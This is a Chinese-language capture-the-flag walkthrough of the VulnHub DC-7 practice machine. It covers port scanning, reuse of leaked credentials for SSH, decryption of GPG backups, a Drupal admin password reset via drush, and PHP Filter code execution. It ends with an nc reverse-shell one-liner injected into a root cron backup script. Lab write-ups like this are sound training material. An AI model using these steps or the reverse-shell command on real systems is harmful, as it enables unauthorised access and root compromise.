VulnHub::DC-7
阿新 • • 發佈:2020-12-24
實驗環境
提示改靶機只有一個入口點,並只存在一個flag
滲透過程
0x01 資訊蒐集
由於不知道靶機IP地址,進行D段掃描,獲得靶機IP地址:
masscan:
masscan 192.168.2.0/24 -p80 --rate 1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:08:53 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 256 hosts [1 port/host] Discovered open port 80/tcp on 192.168.2.160 Discovered open port 80/tcp on 192.168.2.1
nmap:
nmap -sP 192.168.2.0/24 --min-rate 1000 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:10 CST Nmap scan report for RT-N56U_B1.lan (192.168.2.1) Host is up (0.0022s latency). Nmap scan report for dc-7.lan (192.168.2.160) Host is up (0.00084s latency). Nmap scan report for Administrator.lan (192.168.2.210) Host is up (0.00066s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 10.72 seconds
訪問後發現160主機為靶機DC-7,進行埠掃描:
masscan 192.168.2.160 -p0-65535 --rate 1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:19:37 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 22/tcp on 192.168.2.160 Discovered open port 80/tcp on 192.168.2.160
使用nmap進行詳細掃描:
nmap -sC -sV -p22,80 --min-rate 1000 192.168.2.160
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:23 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for dc-7.lan (192.168.2.160)
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
whatweb識別:
whatweb http://192.168.2.160
http://192.168.2.160 [200 OK] Apache[2.4.25], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.2.160], MetaGenerator[Drupal 8 (https://www.drupal.org)], PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]
0x02 解題
探索過程
查詢cms通用漏洞,發現存在RCE漏洞,測試後無法利用。
目錄掃描未發現利用點。
常見弱口令登入一下,結果發現後臺限制了5次登入失敗會被暫時鎖定。
最後發現靶機提示從外部入手。
解題過程
頁面提示開發者為:@DC7USER
查詢相關資訊發現Github倉庫。
得到資料庫使用者名稱密碼:
dc7user:MdR3xOgB7#dW
竟然能夠登入SSH。
檔案目錄如下:
dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~/backups$ ls
website.sql.gpg website.tar.gz.gpg
備份中的檔案通過gpg加密。檢視mbox檔案發現備份指令碼:
得到gpg加密密碼:PickYourOwnPassword。
該備份指令碼root、www-data使用者可修改。
解密GPG檔案:
gpg -d website.tar.gz.gpg > website.tar.gz
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
得到網站原始檔案與資料庫資訊:
不存在有用資訊。
關注到這個drush命令,drush:Drush is a command line shell and Unix scripting interface for Drupal.
可以通過此命令修改drupal使用者密碼:
修改admin密碼,成功登入。
編輯文章後發現沒有PHP format:
搜尋 Drupal reverse shell 得知需要載入php模組:
使能PHP Filter:
成功接收反彈shell:
修改備份指令碼:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.2.210 10086 >/tmp/f
等待root計劃任務執行,接收反彈shell: